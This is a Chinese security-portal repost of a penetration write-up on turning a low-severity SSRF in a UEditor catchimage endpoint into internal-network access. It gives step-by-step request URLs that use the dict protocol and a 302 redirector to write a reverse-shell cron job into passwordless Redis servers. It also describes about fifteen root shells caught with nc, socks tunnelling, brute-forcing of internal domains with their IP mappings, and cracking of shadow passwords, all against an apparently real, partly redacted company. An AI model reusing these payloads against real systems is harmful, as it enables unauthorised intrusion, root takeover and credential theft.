您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

只用个低危SSRF提权就能进内网

时间:2020-07-06 12:03:47  来源:  作者:

**Github地址:https://github.com/r35tart/PenetrationTestingCase

-----------------------------------------------------漏洞详情:**低危SSRF漏洞

漏洞域名:http://xxxxxxxxx.*.com打开后自动跳转至:http://xxxxxxx.*.com/Public/login且状态码为404 一般这样的URI凭经验感觉是php的站,查看cookies基本可以确定是php的站

只用个低危SSRF提权就能进内网

 

由于是404推测曾经可能跑过测试应用网站可能会遗留一些测试文件或者备份文件,故fuzz了一下看到phpmyadmin的状态码为206的时候就知道有WAF,应该不太好弄,但是看到ueditor百度编辑器的时候兴奋了,因为这很有可能存在SSRF,而你们的内网又那么大,搞不好还在我上次搞过的内网段中,所以如果存在SSRF的话有很大概率能够再次搞进内网。

只用个低危SSRF提权就能进内网

 

几经测试最终找到此SSRF并成功触发

只用个低危SSRF提权就能进内网

 

低危漏洞提权接下来要做的事

1. 摸清SSRF的状态是否为布尔状态

2. 此SSRF支持什么协议

3. 此SSRF是否支持302跳转

一、尝试请求一个没开放的1234端口回复"链接不可用"

二、尝试请求开放的22端口回显"链接不可用"

三、尝试请求开放的80端口回显"success"并把图片抓了回来

四、尝试请求我的302跳转回复"链接不可用"但是跳转成功。得出结论:

此SSRF为布尔型SSRF,能探测http应用并获取html源码、支持302跳转,可尝试通过响应速度来探测端口但误报率很高(某些端口可能是一直连接,最后超时)

只用个低危SSRF提权就能进内网

 

知道此SSRF的性质以后便需要开始测试他支持什么协议了,经测试发现由于使用的php版本比较老支持好几个协议,使用gopher协议的时候状态为206提示有WAF,但WAF却没拦截DICT协议,虽然gopher协议有WAF拦截但是支持DCIT的话一样可以扫描内网redis写shell反弹,只不过相对麻烦而已,并不碍事。

只用个低危SSRF提权就能进内网

 

现在有一个问题就是我并不知道内网IP段是多少,于是我便去Github上面去找内网域名,找到以下内网域名gitlab.corp.*.com、jk.corp.*.com、wiki.corp.*.com等… 并通过SSRF请求jk.corp.*.com从中获取到了内网IP信息

只用个低危SSRF提权就能进内网

 

然后就开始尝试内网编织大致摸清了几个网段的分布和作用(根据logo识别应用)

只用个低危SSRF提权就能进内网

 


只用个低危SSRF提权就能进内网

 

最后发现88段应该为脆弱的开发业务段,根据之前搞了你们另外一个内网的经验,断定此段必定存在多个redis数据库而且还是空口令的,于是使用dict协议往10.20.85-95.1/24段发redis写shell的请求

使用dict协议向Redis数据库写shell

1.先清除没用的数据,防止定时任务执行失败

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=flushall

2.利用302跳转写入反弹命令

/php/controller.php?action=catchimage&source[]=http://xxxx/s.php?s=dict%26ip=10.20.*.*%26port=6379%26bhost=*.*.*.*%26bport=1234

3.设置导出路径

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=config:set:dir:/var/spool/cron/

4.设置导出名字

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=config:set:dbfilename:root

5.导出

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=save

使用burp发包,为了避免语句顺序执行错误,故第一个包先跑50个再跑第二个包以此类推

只用个低危SSRF提权就能进内网

 

获取内网多台ROOT权限

使用nc持续监听端口,刚刚全部跑完马上就有差不多15台左右主机反弹出来了而且都是root权限

只用个低危SSRF提权就能进内网

 

在其中一台内网一台云服中发现了多个数据库并发现了f**p的相关业务

只用个低危SSRF提权就能进内网

 


只用个低危SSRF提权就能进内网

 

89段office办公主机 跑着***系统

渗透内网!

尝试打socket隧道出来

只用个低危SSRF提权就能进内网

 

内网探测

只用个低危SSRF提权就能进内网

 

使用ew打的socke隧道经常出问题,于是把自己写的内网探测脚本丢到服务器上跑了起来,只挑了几个重要的核心网段跑

只用个低危SSRF提权就能进内网

 


只用个低危SSRF提权就能进内网

 

发现172网段是 http://www.***.com/ 所在的业务段为了更加快速的定位到重要网段,我对内网域名进行了爆破并查看他们的解析地址

只用个低危SSRF提权就能进内网

 

who.corp.*.com (10.20.95.89)

gongdan.corp.*.com (10.100.100.204)

work.corp.*.com (10.100.75.25)

jk.corp.*.com (10.20.95.86)

baize.corp.*.com (172.31.80.151)

asset.corp.*.com (10.20.95.50)

pm.corp.*.com (10.20.95.29)

wiki.corp.*.com (10.20.95.87)

cms.corp.*.com (172.31.80.101)

…….

本帖隐藏的内容需要积分高于 1000 才可浏览

抓了几个shadow的密码跑了一下 发现弱口令挺多的

只用个低危SSRF提权就能进内网

 

一堆平台只是打开看了一下,并没有进一步操作

渗透到这里就该结束了,本想着下一步先使用metasploit打两台window后尝试拿域控的,因为比较难遇到这样的实战环境,但还是没有进行进一步操作,点到为止。此漏洞从周四晚上八九点发现低危SSRF到拿到内网ROOT权限用了不到三个小时时间,但是由于waf 和ids等设备的阻拦打socks隧道花了我将近两倍拿shell 的时间,最终发现不稳定的原因是我的nc -k参数持续监听了端口,导致内网十几台redis数据库都在同时请求我的端口上线,我想执行一条命令,将会同时在这十几台上线的主机上同时执行,这导致了我的socke端口堵塞,最后解决办法是,不用-k参数,当一台主机上线后,不接受其他主机上线请求。然后操作这台主机使用sSocks 再打一条相对稳定的socks隧道出来,直入内网,不得不说sSocks相比EW稳得一批。

结束语:

任何严重漏洞的背后必然是从一个不起眼的没什么技术含量的容易被忽略的漏洞引起的,做好细微漏洞的防范的能防止重大信息安全事故的发生。



Tags:SSRF提权   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
**Github地址:https://github.com/r35tart/PenetrationTestingCase-----------------------------------------------------漏洞详情:**低危SSRF漏洞漏洞域名:http://xxxxxxxxx...【详细内容】
2020-07-06  Tags: SSRF提权  点击:(82)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross—Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条